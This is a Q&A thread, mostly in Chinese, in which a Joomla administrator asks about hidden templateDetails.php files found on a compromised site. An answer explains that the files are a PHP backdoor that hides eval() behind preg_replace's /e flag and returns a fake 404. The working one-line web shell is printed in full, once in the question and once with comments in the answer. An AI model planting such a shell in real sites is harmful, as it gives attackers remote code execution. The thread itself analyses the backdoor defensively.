問題描述
代碼是什麼意思,惡意黑客如何使用? (What does the code mean and how can be used by malicious hackers?)
我剛剛在站點的Joomla安裝上發現我正在管理許多隱藏在各種文件夾中的templateDetails.php文件,代碼如下:
<?php if (!isset($_REQUEST['e44e'])) header("HTTP/1.0 404 Not Found"); @preg_replace('/(.*)/e', @$_REQUEST['e44e'], ''); ?>
我及時恢復了站點備份,更改了所有管理員密碼並加強了網站的安全性。
你能解釋一下這種代碼是如何被用來竊取或破壞網站的嗎?
參考解法
方法 1:
I've commented the code below for you to explain:
<?php
//Check for a POST or GET (query string) variable called e44e
if (!isset($_REQUEST['e44e']))
header("HTTP/1.0 404 Not Found"); //If that variable doesn't exist, send a 404
// This is quite clever ‑ the 'e' flag in preg forces PHP to eval the string, and then in theory use the result as the preg_replace (however in this case, that bit doesn't matter, as actually all we are looking to do is evecute whatever has been passed through request ‑ basically doing eval(), but hiding it so it's not as obvious, and won't get picked up (in theory) by any installs that block eval (although in practise most then also stop the e flag from working as well)
@preg_replace('/(.*)/e', @$_REQUEST['e44e'], '');
?>
In sort, it's a fancy way to use eval(), allowing them to pass through any code as a query string, and then execute it!
(by Drake、Liam Wiltshire)